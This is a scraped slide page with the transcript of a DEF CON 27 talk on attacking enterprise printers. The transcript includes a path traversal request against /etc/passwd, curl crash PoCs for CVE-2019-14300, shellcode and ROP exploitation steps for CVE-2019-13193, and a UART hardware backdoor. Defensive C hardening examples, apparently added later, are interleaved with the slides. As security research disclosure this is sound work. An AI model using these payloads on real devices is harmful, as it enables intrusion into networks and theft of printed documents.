DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
Felipe Prado
 
PDF
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
Felipe Prado
 
PDF
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
Felipe Prado
 
PDF
DEF CON 24 - Antonio Joseph - fuzzing android devices
Felipe Prado
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
Felipe Prado
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
Felipe Prado
 
DEF CON 24 - Tamas Szakaly - help i got ants
Felipe Prado
 
DEF CON 24 - Ladar Levison - compelled decryption
Felipe Prado
 
DEF CON 24 - Clarence Chio - machine duping 101
Felipe Prado
 
DEF CON 24 - Chris Rock - how to overthrow a government
Felipe Prado
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
Felipe Prado
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
Felipe Prado
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
Felipe Prado
 
DEF CON 24 - Gorenc Sands - hacker machine interface
Felipe Prado
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
Felipe Prado
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
Felipe Prado
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
Felipe Prado
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
Felipe Prado
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
Felipe Prado
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
Felipe Prado
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
Felipe Prado
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
Felipe Prado
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
Felipe Prado
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
Felipe Prado
 

Recently uploaded (20)

PDF
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
PDF
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
PDF
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
PPTX
What-is-the-World-Wide-Web -- Introduction
tonifi9488
 
PPTX
The-Ethical-Hackers-Imperative-Safeguarding-the-Digital-Frontier.pptx
sujalchauhan1305
 
PDF
BLW VOCATIONAL TRAINING SUMMER INTERNSHIP REPORT
codernjn73
 
PPT
Coupa-Kickoff-Meeting-Template presentai
annapureddyn
 
PDF
Data_Analytics_vs_Data_Science_vs_BI_by_CA_Suvidha_Chaplot.pdf
CA Suvidha Chaplot
 
PPTX
OA presentation.pptx OA presentation.pptx
pateldhruv002338
 
PDF
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
PDF
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
PDF
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
PPTX
Coupa-Overview _Assumptions presentation
annapureddyn
 
PDF
Cloud-Migration-Best-Practices-A-Practical-Guide-to-AWS-Azure-and-Google-Clou...
Artjoker Software Development Company
 
PDF
Event Presentation Google Cloud Next Extended 2025
minhtrietgect
 
PDF
Software Development Company | KodekX
KodekX
 
PDF
Using Anchore and DefectDojo to Stand Up Your DevSecOps Function
Anchore
 
PPTX
Comunidade Salesforce São Paulo - Desmistificando o Omnistudio (Vlocity)
Francisco Vieira Júnior
 
PPTX
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
PDF
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
Presentation about Hardware and Software in Computer
snehamodhawadiya
 
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
What-is-the-World-Wide-Web -- Introduction
tonifi9488
 
The-Ethical-Hackers-Imperative-Safeguarding-the-Digital-Frontier.pptx
sujalchauhan1305
 
BLW VOCATIONAL TRAINING SUMMER INTERNSHIP REPORT
codernjn73
 
Coupa-Kickoff-Meeting-Template presentai
annapureddyn
 
Data_Analytics_vs_Data_Science_vs_BI_by_CA_Suvidha_Chaplot.pdf
CA Suvidha Chaplot
 
OA presentation.pptx OA presentation.pptx
pateldhruv002338
 
Google I/O Extended 2025 Baku - all ppts
HusseinMalikMammadli
 
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
Coupa-Overview _Assumptions presentation
annapureddyn
 
Cloud-Migration-Best-Practices-A-Practical-Guide-to-AWS-Azure-and-Google-Clou...
Artjoker Software Development Company
 
Event Presentation Google Cloud Next Extended 2025
minhtrietgect
 
Software Development Company | KodekX
KodekX
 
Using Anchore and DefectDojo to Stand Up Your DevSecOps Function
Anchore
 
Comunidade Salesforce São Paulo - Desmistificando o Omnistudio (Vlocity)
Francisco Vieira Júnior
 
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 

DEF CON 27 - DANIEL ROMERO and MARIO RIVAS - why you should fear your mundane office

  • 1. Why you should fear your "mundane" office equipment
Daniel Romero @daniel_rome
Mario Rivas @grifo

  • 2. Who the hell are these guys?
Daniel Romero Pérez
 Principal Security Consultant
 Focused on IoT / Embedded Systems
 Hardware, RE, exploiting, etc.
 @daniel_rome
 daniel.romero@nccgroup.com
Mario Rivas Vivar
 Senior Security Consultant
 Too many interests
 Lately focused on what you will see here 
 @grifo
 mario.rivas@nccgroup.com
Both from NCC Group's Madrid office

  • 3. Agenda
 Introduction and attack surface
 Testing methodology and fuzzing
 A way across the vulnerabilities found
 Let’s exploit something!
 Conclusions

  • 5. Introduction
 Figure out the current state of security of enterprise embedded devices (such as printers)
 Medium-size enterprise printers:
 Xerox, HP
 Ricoh, Brother
 Lexmark, Kyocera
 Red Teaming approach
 It wasn’t an assessment
 One RCE vuln would be enough

  • 6. Why printers?
 Networked printers have been around since at least the 1980s
 They sit and are configured on sensitive parts of corporate networks
 Great for pivoting and launching network attacks
 They process all manner of information
 Corporate Sensitive, Personal Sensitive, Financial, Customer etc.
 They are often assumed to be low risk targets and fairly dumb in capability
 Shadow IT – printers might be purchased through unofficial procurement channels

  • 7. Why printers? (same bullet text as slide 6)

  • 10. Attack Surface
Embedded device:
 RTOS
 Linux
Diagram areas: Printer Lang and Services; Mgmt. Services and others; External Services; Proximity Attacks: WiFi, USB, NFC, etc.; Mobile Apps; Web App and Web Serv; File Parsers; Updates & Firmware; Hardware Analysis; Post Exploitation

  • 11. Attack Surface
Embedded device:
 RTOS
 Linux
Diagram areas shown: Printer Lang and Services; Mgmt. Services and others; External Services; Web App and Web Serv; Updates & Firmware; Hardware Analysis; Post Exploitation

  • 12. Huge Attack Surface (diagram; legend: Included in the “scope” / Not Tested (future work?))
Hardware: UART/Serial, JTAG, Exposed Memories, Maintenance Modes
Firmware: Firmware Updates
Exposed Services:
 Printer Services: RAW, IPP, LPD, SMB, FTP
 Web and Web Services: Web Application, Web Services
 Management Services: SNMP, Netbios, Telnet, Remote Management
 Other Services: Finger, MDNS, SVRLOC, VNC, Unknown Services
External Software: Mobile Apps, Desktop Applications
External Interactions: Google Cloud Print, AirPrint
Printer Capabilities: WiFi, WiFi Direct Access, NFC
Printer Languages / File Formats: PJL, PCL, PS, PDF, Image Formats, Others
L2 / L3 Protocols: TCP, UDP, ICMP, …
  • 15. Fuzzing & Approach Taken
 Dumb Fuzzing
 Get valid communications
 Generate random (and invalid) mutations
 Start fuzzing after a few minutes
 Understanding the crash is harder
 Smart Fuzzing
 Implement RFC compliant messages
 Mutate what you want, how you want
 More coding time
 Way easier to investigate the crash

  • 16. Our fuzzer
 The main objective was to make our life easier while fuzzing
 Based on Sulley Fuzzer for data generation [https://github.com/OpenRCE/sulley]
 Actually, a fork from BooFuzz [https://github.com/jtpereyda/boofuzz]
 Great Request, Connection, Logger and Session modules
 After Sulley and Boo… Wazowski was next, so…
 We called it Fuzzowski
 Python3
 Improved Strings fuzzing libraries
 Custom lists, files and callback command injection mutations
 Fuzzer modules, to keep all your fuzzers under one single program
 Lots of little tweaks to adapt the fuzzing session
 We try to solve the difficulties that we were having while fuzzing…

  • 17. Fuzzowski
Difficulties → Our Solutions:
 Different behaviours for the same protocols → Flexibility to adapt the fuzzing session
 Different ways to detect a crash → Monitor modules to check what we want
 Need to reboot targets manually after a crash → Restarter modules which are called after losing connection to the target
 Retesting a “suspect” packet can be a pain → CLI to pause and control the fuzzing session
 Understanding your mutated packets can be hard → Nice print formats for suspect packets (to know exactly what was fuzzed)
 Need to report a lot of different crashes to the manufacturer → Save standalone scripts to send a crash PoC

  • 20. The code will be available after the talk: https://github.com/nccgroup/fuzzowski
  • 21. Just a bit of Hardware

  • 22. Hardware Analysis
 Basic approach!
 Focused on things to help us with the exploitation
 Debug interfaces
 Dump memories
 Test points and...
 Short circuit all the things!
 One of our printers will never print again…

  • 23. Exposed Memories
# ./flashrom -V -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r /tmp/flash.bin -c MX25L12835F/MX25L12845E/MX25L12865E
flashrom 0.9.9-91-g0bfa819 on Linux 4.15.0-42-generic (x86_64)
flashrom is free software, get the source code at https://flashrom.org
flashrom was built with libpci 3.2.1, GCC 4.8.4, little endian
Command line (7 args): ./flashrom -V -p buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M -r /tmp/flash.bin -c MX25L12835F/MX25L12845E/MX25L12865E
Using clock_gettime for delay loops (clk_id: 1, resolution: 1ns).
Initializing buspirate_spi programmer
Detected Bus Pirate hardware v3b
Detected Bus Pirate firmware 5.10
Using SPI command set v2.
SPI speed is 1MHz
Raw bitbang mode version 1
Raw SPI mode version 1
The following protocols are supported: SPI.
Probing for Macronix MX25L12835F/MX25L12845E/MX25L12865E, 16384 kB: probe_spi_rdid_generic: id1 0xc2, id2 0x2018
...

  • 24. Hardware Issues
 UART/Serial Debugging Ports
 Tons of debug information
 Write and execute your assembly here!
Board photos (JTAG and UART headers) with pinouts:
UART pinout: 1 - GND (black), 2 - Rx (yellow), 3 - Tx (green), 4 - VCC
Pinout: 1 - GND, 2 - Rx, 3 - Tx, 4 - VCC
JRS1 pinout: 1 - GND, 2 - Rx, 3 - Tx, 4 - VCC; JRS2 pinout: 1 - VCC, 2 - Rx, 3 - Tx, 4 - GND

  • 25. Hardware Issues
 Hardware Backdooring:
 Serial allowed read, write and execute
 Raspberry Pi → hardware backdoor
 Pi connected to WiFi AP
Printer UART pinout → Raspberry Pi pinout: VCC → (4) 5V; GND → (6) GND; Rx → (8) GPIO 14 (TXD); Tx → (10) GPIO 15 (RXD)
UART shell help output:
363:[199714]:<kb_uart >addr/address:show address value
364:[199714]:<kb_uart >addrc/addressc:change address value
367:[199714]:<kb_uart >sh:show shell command help
368:[199714]:<kb_uart >shell:shell run a function in task mode
369:[199714]:<kb_uart >sd/shelld:stop a running shell task
370:[199714]:<kb_uart >sda/shelld,all:stop all running shell task
371:[199714]:<kb_uart >Shell command example:
372:[199714]:<kb_uart >[shell 0x12345678 1234]
373:[199714]:<kb_uart >shell run a function locate at 0x12345678 with arg 1234
  • 27. Common Web Application Issues
 Weak Default Configurations
 Tons of services exposed and enabled by default, with weak configurations
 Default Credentials (or no credentials required!)
 Clear Text Communications
 Cross-Site Request Forgery
 Broken Access Controls
 Cross-Site Scripting issues

  • 29. Path Traversal
 Allowed access to files with certain extensions anywhere in the filesystem
 sh, js, css, htm...
 Allowed checking whether a file existed or not:
okhtmfile=/js/../../../etc/passwd - Error 500
okhtmfile=/js/../../../etc/notexist - Error 404
 Could also be used to get files that otherwise would require authentication:
POST /box/set.cgi HTTP/1.1
Content-Type: application/x-www-form-urlencoded

okhtmfile=/js/../../../../../../etc/init.d/hostname.sh&failhtmfile=[...]

HTTP/1.1 200 OK
ETag: "/js/../../../../../../etc/init.d/hostname.sh, Wed, 30 Jan 2019 09:53:39 GMT"
Content-Type: application/x-sh

#!/bin/sh
### BEGIN INIT INFO
# Default-Start: S
# Default-Stop:
# Short-Description: Set hostname based on /etc/hostname
### END INIT INFO
HOSTNAME=$(/bin/hostname)
hostname -b -F /etc/hostname 2> /dev/null
[…]
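The two defects on this slide are an extension check applied to the raw path (so "/js/../" walks out of the web root) and a response code that differs for existing and missing files. As an added example, not the printer's web server, here is a lexical canonicaliser applied before the extension allow-list, plus a uniform 404 that removes the 500-vs-404 existence oracle; the file table and the allow-list (which deliberately drops .sh) are constructed for the example, and percent-decoding is assumed to happen before this point.

```c
#include <stddef.h>
#include <string.h>

/* Added example, not the printer's web server: canonicalise first, then
 * allow-list the extension, then answer one status for "escaped", "wrong
 * type" and "missing". Percent-decoding is assumed to happen before here. */

#define MAX_SEGS 64

/* Resolves "." and ".." lexically. Returns 0 and writes the canonical path
 * (always starting with '/'), or -1 if the path is relative, would climb
 * above the document root, or does not fit in out. */
int canonicalize_path(const char *req, char *out, size_t out_sz)
{
    const char *segs[MAX_SEGS];
    size_t lens[MAX_SEGS];
    int depth = 0;

    if (req[0] != '/' || out_sz < 2)
        return -1;
    for (const char *p = req + 1; ; ) {
        const char *e = strchr(p, '/');
        size_t n = e ? (size_t)(e - p) : strlen(p);
        if (n == 0 || (n == 1 && p[0] == '.')) {
            /* "//" and "/./" add nothing */
        } else if (n == 2 && p[0] == '.' && p[1] == '.') {
            if (depth == 0)
                return -1;          /* ".." at the root: escape attempt */
            depth--;
        } else {
            if (depth == MAX_SEGS)
                return -1;
            segs[depth] = p;
            lens[depth++] = n;
        }
        if (!e)
            break;
        p = e + 1;
    }

    size_t used = 0;
    for (int i = 0; i < depth; i++) {
        if (used + 1 + lens[i] + 1 > out_sz)
            return -1;
        out[used++] = '/';
        memcpy(out + used, segs[i], lens[i]);
        used += lens[i];
    }
    if (used == 0)
        out[used++] = '/';          /* the root itself */
    out[used] = '\0';
    return 0;
}

/* Static content only; the original also served .sh, which is how the init
 * script on this slide leaked, so that extension is absent here (our choice). */
int extension_allowed(const char *path)
{
    static const char *const ok[] = { ".htm", ".js", ".css" };
    size_t plen = strlen(path);
    for (size_t i = 0; i < sizeof ok / sizeof ok[0]; i++) {
        size_t elen = strlen(ok[i]);
        if (plen > elen && strcmp(path + plen - elen, ok[i]) == 0)
            return 1;
    }
    return 0;
}

/* Constructed document-root listing standing in for the real filesystem. */
static const char *const docroot_files[] = {
    "/index.htm", "/js/app.js", "/css/main.css"
};

/* HTTP status the handler would answer: 200 only for an allow-listed file
 * inside the root; otherwise a uniform 404, never a distinguishing 500. */
int serve_status(const char *req)
{
    char canon[256];
    if (canonicalize_path(req, canon, sizeof canon) != 0)
        return 404;
    if (!extension_allowed(canon))
        return 404;
    for (size_t i = 0; i < sizeof docroot_files / sizeof docroot_files[0]; i++)
        if (strcmp(canon, docroot_files[i]) == 0)
            return 200;
    return 404;
}

/* Test hook: 1 if req canonicalises to exactly expect. */
int canon_equals(const char *req, const char *expect)
{
    char canon[256];
    return canonicalize_path(req, canon, sizeof canon) == 0 &&
           strcmp(canon, expect) == 0;
}
```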
  • 30. These issues are not bad, but…
  • 35. Memory Corruption Issues
 Printer 1
 Multiple Buffer Overflow Parsing Cookies Values (x6)
 Buffer Overflow Setting WiFi Values
 Buffer Overflow Setting mDNS Values
 Buffer Overflow Setting Notification Alerts
 Buffer Overflow Setting POP3 Values
 Buffer Overflow Setting SMTP Values
 Denial of Service Setting SNMP Values
 LPD Denial of Service by Sending a Queue command
 Buffer Overflow Sending a Crafted LPD Packet
 Multiple Buffer Overflows Parsing IPP Packets (x3)
 Printer 2
 Buffer Overflow in Fax Number
 Buffer Overflow in IPP attribute names
 Buffer Overflow in IPP attribute values
 Buffer Overflow in IPP attribute sizes
 Multiple Buffer Overflows in IPP parser
 Printer 3
 Buffer Overflow in “AuthCookie” cookie
 Heap Buffer Overflow in IPP attribute’s name
 Printer 4
 Buffer Overflow in Content-Type Header
 Buffer Overflow in Authentication Cookie
 Multiple Buffer Overflows parsing IPP Attributes (x3)
 Buffer Overflow in Google Cloud Print
 Printer 5
 Buffer Overflow Parsing The LexLang Cookie
 Buffer Overflow Parsing The Request URI (x6)
 Buffer Overflow Parsing Content-Type Headers
 Memory Corruption in SNMP (DoS)
 Memory Corruption Parsing Config Parameters
 Printer 6
 Buffer Overflow parsing URI paths
 Buffer Overflow in several Web Application Functionalities
 Buffer Overflow with Big Control Files in LPD
 Multiple Memory Corruptions Parsing IPP Packets

  • 36. Memory Corruption Issues – Crashes Everywhere
Exception address: 0x58585858
Current Processor Status Register: 0x60000013
Task: 0x17bd770 "HC02P"
...
Exception PC = 0x58585858
Current PSR = 0x60000013
--------------------------------------------
TRACE STACK:
--------------------------------------------
current stack = 0x017be52c
start stack = 0x00100000
text_start = 0x00100000
text_end = 0x00a35220
--------------------------------------------
001 : 0x0039c720
002 : 0x0011ad24

  • 38. Stack Buffer Overflow – The easy case
CVE-2019-14300: Multiple Stack Buffer Overflow Parsing Cookies Values (x6)
  • 39. Vuln. Exploitation - Going back to 90's exploits?
Stack Buffer Overflow – The easy case
// Decompiled source code
lang_ptr = f_strstr(cookie_header, "print_language");
lang_ptr2 = lang_ptr;
if ( p_lang_pointer )
{
  v5 = *p_lang_pointer;
  v6 = v5;
  if ( v5 != ';' )
    v6 = v5;
  if ( v6 )
  {
    count = 0;
  }
  else
  {
    count = 0;
    do
    {
      ++count;
      v9 = *p_lang_pointer++[1];
      v8 = v9= v10;
      if ( v9 != ';' )
        v10 = v8;
    }
    while ( !v10 );
  }
  strncpy(v_tmp_cookie, (lang_ptr2 + 15), count - 15);  // Stack Buffer Overflow
}
* Do you really think there is only one bug here?
Diagram: print_language = XXXXXXXXXXXXXX.. (Cookie bytes: 0-14 | 15 | 16-N)

  • 40. Vuln. Exploitation - Going back to 90's exploits?
Stack Buffer Overflow – The easy case (same decompiled code and diagram as slide 39)
# DoS Proof of Concept 1:
$ curl --cookie "print_language=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" http://printer/index.asp
# DoS Proof of Concept 2:
$ curl -H 'Cookie: print_language;' http://printer/index.asp
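Both PoCs exercise the same arithmetic in the decompiled snippet: the strncpy length is count - 15 with count taken from the attacker's cookie, and when the value is missing ("print_language;") count is 14, so the length underflows. As an added example, not the printer's firmware or the authors' code, here is that length computation mirrored in C beside a bounded lookup that cannot underflow; LANG_MAX is a constructed buffer size.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added example, not the printer's firmware or the authors' code. LANG_MAX is
 * a constructed size for the stack buffer; COOKIE_NAME is the cookie from the
 * PoCs on this slide. */

#define LANG_MAX     16
#define COOKIE_NAME  "print_language"      /* 14 bytes; "print_language=" is 15 */

/* Mirror of the decompiled arithmetic: count bytes of the matched cookie up to
 * ';' or NUL, then hand count - 15 to strncpy(). Nothing ties it to the size
 * of v_tmp_cookie (PoC 1), and for "print_language;" count is 14, so count - 15
 * becomes SIZE_MAX once converted to size_t (PoC 2). */
size_t original_copy_len(const char *lang_ptr)
{
    int count = 0;
    for (const char *p = lang_ptr; *p && *p != ';'; p++)
        count++;
    return (size_t)(count - 15);            /* what strncpy() would receive */
}

/* Bounded lookup: returns the value length (< out_sz) or -1 when the cookie is
 * absent, has no '=', or does not fit. The length comes from strcspn(), so it
 * cannot underflow, and the fit check happens before any byte is copied. */
int get_cookie_value(const char *header, const char *name,
                     char *out, size_t out_sz)
{
    size_t nlen = strlen(name);
    const char *p = header;
    while ((p = strstr(p, name)) != NULL) {
        /* a real match starts the header or follows a separator and is
         * followed by '='; "xprint_language=..." must not match */
        int boundary = (p == header) || p[-1] == ';' || p[-1] == ' ';
        if (boundary && p[nlen] == '=') {
            const char *v = p + nlen + 1;
            size_t vlen = strcspn(v, ";");
            if (vlen >= out_sz)
                return -1;
            memcpy(out, v, vlen);
            out[vlen] = '\0';
            return (int)vlen;
        }
        p += nlen;
    }
    return -1;
}

/* Test hook: 1 if the hardened lookup yields exactly expect; expect == NULL
 * means the header must be rejected. */
int cookie_check(const char *header, const char *expect)
{
    char buf[LANG_MAX];
    int n = get_cookie_value(header, COOKIE_NAME, buf, sizeof buf);
    if (expect == NULL)
        return n < 0;
    return n >= 0 && strcmp(buf, expect) == 0;
}
```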
  • 41. Stack Buffer Overflow – The easy case
Vuln. Exploitation - Going back to 90's exploits?
Difficulties:
 ASLR (HEAP & STACK)
 No SW Debug
 RTOS (1 Kernel / 1 Binary)
Helpers:
 Direct PC overwrite
 Potential RWX
 No NX
 Mem leak
Exploitation chain: Send Shellcode (btw. patterns) → Dump RAM (Mem. Leak) → Identify Shellcode address → Trigger the BoF → Jump to the Shellcode

  • 42. Stack Buffer Overflow – The easy case
But what is one of the most important kinds of data managed by a printer? THE DOCUMENTS!

  • 43. Stack Buffer Overflow – The easy case
DEMO
  • 45. Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
 One of the first bugs found
 Initially, it was not analyzed in depth as:
 No SOFTWARE or HARDWARE debug
 The Kernel implements other protections
GET /deadbeef HTTP/1.1
Host: printer
User-Agent: Mozilla/5.0 Gecko/20100101 Firefox/62.0
Accept-Language: en-US
Cookie: AuthCookie=5a482cb4aabdcc97d5293221dff2ee7f5ca:4hh7fA4675FOnWgJfA7mCq2NsaU6AwoAAA%3D%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[SNIP]
Connection: close
(Part 1 = the cookie value before the “:”, Part 2 = the value after it)

  • 46. CVE-2019-13193: Buffer Overflow in Cookie Values
Buffer Overflow – The tricky case
AuthCookie=5a482cb408cc97d5298b6eff2ee7f5ca:4hh7fA4675FOnWgJfA7mCq2NsaU6AwoAAA%3D%3DAAAAAAAAAAAAAAAAAA[SNIP]
After RE’ing the printer’s firmware:
1) Parse headers
2) Get cookie values
3) Check the first part of the cookie
4) Get and check the second part of the cookie (after “:”)
4.1) Decode the base64 value
4.2) Get a TOKEN and a KEY from memory
4.3) Calculate a SHA1 HASH from KEY
4.4) …
  • 47. CVE-2019-13193: Buffer Overflow in Cookie Values
Buffer Overflow – The tricky case
struct cookie_s {
  int *src_ptr;      // base64 cookie string
  int *dst_ptr;      // base64 decoded result
  char junk[4];
  __int16 src_len;   // source len
  __int16 dst_len;   // destination len
};
base64_decode(struct cookie_s *cookie)

  • 48. CVE-2019-13193: Buffer Overflow in Cookie Values
Buffer Overflow – The tricky case
int get_check_second_part_cookie(int *b64_cookie_text) { .. }
(same struct cookie_s as slide 47)
Q: Can you spot the bug?
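The question on this slide comes down to sizes: src_len is whatever length the attacker's cookie has, dst_ptr is a fixed buffer, and a decoder that never compares the decoded size with dst_len writes past it. As an added example, not the firmware's decoder, here is cookie_s with concrete types and a decoder that derives the worst-case output size from src_len and refuses before writing anything; the field order follows slide 47, the int16_t types and the 256-byte scratch buffer are assumptions, and the 100-'A' input is the one from the next slide's emulation run, constructed inline.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Added example, not the firmware's code: the slide's cookie_s with concrete
 * C types (int16_t for __int16 is an assumption) and a decoder that checks
 * the decoded size against dst_len before writing. Decoding rules are the
 * standard base64 alphabet with '=' padding. */
struct cookie_s {
    const unsigned char *src_ptr;   /* base64 cookie string */
    unsigned char       *dst_ptr;   /* base64 decoded result */
    char                 junk[4];
    int16_t              src_len;   /* source len */
    int16_t              dst_len;   /* destination len (capacity) */
};

static int b64val(int c)
{
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Returns the number of decoded bytes, or -1 if the input is malformed or the
 * decoded output would not fit in dst_len bytes. The size check is the point:
 * src_len is attacker-controlled through the cookie, dst_ptr is a fixed
 * buffer, so the bound must be derived from src_len before any write. */
int base64_decode_checked(struct cookie_s *c)
{
    if (c->src_len < 0 || c->dst_len < 0 || c->src_len % 4 != 0)
        return -1;
    size_t groups = (size_t)c->src_len / 4;
    if (groups * 3 > (size_t)c->dst_len)      /* worst case: 3 bytes per group */
        return -1;

    size_t out = 0;
    for (size_t g = 0; g < groups; g++) {
        const unsigned char *s = c->src_ptr + 4 * g;
        unsigned v = 0;
        int pad = 0;
        for (int i = 0; i < 4; i++) {
            if (s[i] == '=') {
                /* '=' is only valid in the last group, positions 2 and 3 */
                if (g != groups - 1 || i < 2) return -1;
                pad++;
                v <<= 6;
            } else {
                int d = b64val(s[i]);
                if (pad || d < 0) return -1;  /* data after '=' or bad char */
                v = (v << 6) | (unsigned)d;
            }
        }
        c->dst_ptr[out++] = (unsigned char)(v >> 16);
        if (pad < 2) c->dst_ptr[out++] = (unsigned char)(v >> 8);
        if (pad < 1) c->dst_ptr[out++] = (unsigned char)v;
    }
    return (int)out;
}

static unsigned char scratch[256];   /* stands in for the fixed firmware buffer */

/* Test hook: decode b64 into scratch while advertising dst_cap bytes. */
int decode_demo(const char *b64, int dst_cap)
{
    struct cookie_s c = { (const unsigned char *)b64, scratch, {0},
                          (int16_t)strlen(b64), (int16_t)dst_cap };
    return base64_decode_checked(&c);
}

/* Test hook: 1 if decoding b64 with the full capacity yields exactly expect. */
int decode_demo_equals(const char *b64, const char *expect)
{
    int n = decode_demo(b64, (int)sizeof scratch);
    return n == (int)strlen(expect) && memcmp(scratch, expect, (size_t)n) == 0;
}

/* Test hook: the emulation input from the next slide, 100 'A' bytes
 * base64-encoded (136 chars, constructed here), into dst_cap bytes. */
int decode_hundred_a(int dst_cap)
{
    char b64[137];
    for (int i = 0; i < 33; i++)
        memcpy(b64 + 4 * i, "QUFB", 4);    /* "AAA" -> "QUFB", 33 times = 99 bytes */
    memcpy(b64 + 132, "QQ==", 5);          /* final "A" plus the terminating NUL */
    return decode_demo(b64, dst_cap);
}
```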
  • 49. Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
Function get_check_second_part_cookie() emulation, calling strlen, base64_decode, etc.:
$ python check-cookie-emul.py $(python -c 'print "A"*100' | base64 -w 0)
========================== Emulating THUMB code snip -
>>> Tracing instruction at 0x1474b78, instruction size = 0x2
ERROR: Invalid memory fetch (UC_ERR_FETCH_UNMAPPED)
>>> r0 = 0x3
>>> r3 = 0x1281010
>>> r4 = 0x41414141
>>> r5 = 0x41414141
>>> lr = 0x1001000
>>> sp = 0x1002000
>>> pc = 0x41414140
========== SP register: 4141414141414141414141414141414141414141414141414141414141414141414141000000000000
https://www.unicorn-engine.org/

  • 50. Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
But everything became insane here:
 No executable STACK - NX
 Firmware addresses didn’t work - ASLR?
 Modified T-KERNEL (RTOS) in use:
 Protection levels
 Thousands of *linker* structures
 Non monolithic OS - Apps / Tasks (Offsets)
 Shared memory
 Can implement MMU
Therefore, we didn’t know:
 Where and how our shellcode could be executed (~ASLR + NX)
 Valid addresses to create a ROP chain

  • 51. Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
Some potential (and insane) approaches:
 RE the T-KERNEL structure – No time!
 RE the bootloader (potential static addresses)
 Identify static memory – Permissions?
 Brute-force random addresses
 Looking for code helpers
Infinite Loop! - Blind Exploitation?
  • 52. CVE-2019-13193: Buffer Overflow in Cookie Values
Buffer Overflow – The tricky case
Brute-forcing the PC register with potential firmware addresses and figuring out which instructions were executed.
Example 1 - Identifying POP instructions:
Potential Epilog 1:
0x10: ...
0x12: ...
0x14: pop {r0, pc}
Before execution (PC: 0x14), stack from SP: AAAA, AAAA, AAAA, INFINITE_LOOP, …
After execution: R0 = AAAA, PC = AAAA → PRINTER DOWN!

  • 53. CVE-2019-13193: Buffer Overflow in Cookie Values
Buffer Overflow – The tricky case
Brute-forcing the PC register with potential firmware addresses and figuring out which instructions were executed.
Example 1B - Identifying POP instructions:
Potential Epilog 1:
0x10: ...
0x12: ...
0x14: pop {r0, pc}
Before execution (PC: 0x14), stack from SP: AAAA, INFINITE_LOOP, …, …, …
After execution: R0 = AAAA, PC = INFINITE_LOOP → PRINTER UP!

  • 54. Buffer Overflow – The tricky case
CVE-2019-13193: Buffer Overflow in Cookie Values
Two matchable behaviours were found that allowed us to identify a valid offset assigned to the web RTOS task.
Firmware data: 0x12: add sp, 28; 0x14: pop {r0, r1, pc}; .... (0x500 further) 0x512: pop {r0-r7, pc}
Printer memory: 0x1132: add sp, 28; 0x1134: pop {r0, r1, pc}; .... 0x1632: pop {r0-r7, pc}
 Task Offset: 0x1132 - 0x12 = 0x1120
 Only for this (web) RTOS task
 This provided us useful ROP gadgets and potential helpers to continue the task execution (which is really important)

  • 55. Buffer Overflow – The tricky case
What about creating ROP chains with (not coherent) IMAGE (GIF or PNG) offsets?
$ for i in `ls *.{gif,png}`; do echo "========== $i"; python ROPgadget.py --rawArch=arm --rawMode=thumb --binary $i | grep "pop {"; done | grep -E "(==|str r6)"
========== adhoc.gif
========== allow2.gif
- SNIP -
========== device-icons-128.png
0x000000000000034e : str r6, [r5, #0x20] ; lsls r5, r2, #0x1a ; subs r0, #0xa9 ; pop {r1, r4, r5, r6, pc}
0x0000000000000346 : strh r2, [r7, #0x12] ; ldm r6, {r1, r2, r3, r6, r7} ; ldrh r6, [r1, r1] ; add r4, sp, #0x144 ; str r6, [r5, #0x20] ; lsls r5, r2, #0x1a ; subs r0, #0xa9 ; pop {r1, r4, r5, r6, pc}
========== device-icons-512.png
